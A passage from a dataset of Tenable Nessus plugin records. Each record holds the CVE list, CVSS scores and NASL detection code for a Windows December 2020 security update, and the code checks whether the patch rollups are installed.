bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17095,\n CVE-2020-17096)\n\n - A security feature bypass vulnerability exists. 
An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-17139)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17094, CVE-2020-17098,\n CVE-2020-17140)\");\n # https://support.microsoft.com/en-us/help/4592449/windows-10-update-kb4592449\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c49efc98\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4592449.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-17095\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592449');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18362',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592449])\n|| \n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592449])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T16:32:54", "description": "The remote Windows host is missing security update 4592464.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. 
An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-17099)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17098, CVE-2020-17140)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17096)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592464: Windows 10 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-17092", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592464.NASL", "href": "https://www.tenable.com/plugins/nessus/143565", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143565);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-17092\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17099\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592464\");\n script_xref(name:\"MSFT\", value:\"MS20-4592464\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592464: Windows 10 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592464.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-17099)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17140)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2020-17096)\");\n # https://support.microsoft.com/en-us/help/4592464/windows-10-update-kb4592464\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3feae7ab\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4592464.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592464');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592464])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-19T00:49:36", "description": "The remote Windows host is missing security update 4592503 or cumulative update 4592471. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17098, CVE-2020-17140)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592503: Windows 7 and Windows Server 2008 R2 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-17098", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592471.NASL", "href": "https://www.tenable.com/plugins/nessus/143572", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143572);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-17098\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592471\");\n script_xref(name:\"MSKB\", value:\"4592503\");\n script_xref(name:\"MSFT\", value:\"MS20-4592471\");\n script_xref(name:\"MSFT\", value:\"MS20-4592503\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592503: Windows 7 and Windows Server 2008 R2 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592503\nor cumulative update 4592471. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17140)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4592471/windows-7-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4592503/windows-7-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4592503 or Cumulative Update KB4592471.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16964\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592471', '4592503');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592471, 4592503])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T16:34:03", "description": "The remote Windows host is missing security update 4592497 or cumulative update 4592468. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-16996)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17096)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592497: Windows Server 2012 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592468.NASL", "href": "https://www.tenable.com/plugins/nessus/143559", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143559);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592497\");\n script_xref(name:\"MSKB\", value:\"4592468\");\n script_xref(name:\"MSFT\", value:\"MS20-4592497\");\n script_xref(name:\"MSFT\", value:\"MS20-4592468\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592497: Windows Server 2012 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592497\nor cumulative update 4592468. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-16996)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2020-17096)\");\n # https://support.microsoft.com/en-us/help/4592497/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d639ba48\");\n # https://support.microsoft.com/en-us/help/4592468/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d79ac842\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4592497 or Cumulative Update KB4592468.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592497', '4592468');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592497, 4592468])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T16:32:55", "description": "The remote Windows host is missing security update 4592495 or cumulative update 4592484. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-16996)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17096)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592495: Windows 8.1 and Windows Server 2012 R2 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592484.NASL", "href": "https://www.tenable.com/plugins/nessus/143560", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143560);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592495\");\n script_xref(name:\"MSKB\", value:\"4592484\");\n script_xref(name:\"MSFT\", value:\"MS20-4592495\");\n script_xref(name:\"MSFT\", value:\"MS20-4592484\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592495: Windows 8.1 and Windows Server 2012 R2 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592495\nor cumulative update 4592484. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-16996)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2020-17096)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4592495/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4592484/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4592495 or Cumulative Update KB4592484.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-12';\nkbs = make_list('4592495', '4592484');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && '8.1' >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592495, 4592484])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9, "vector": 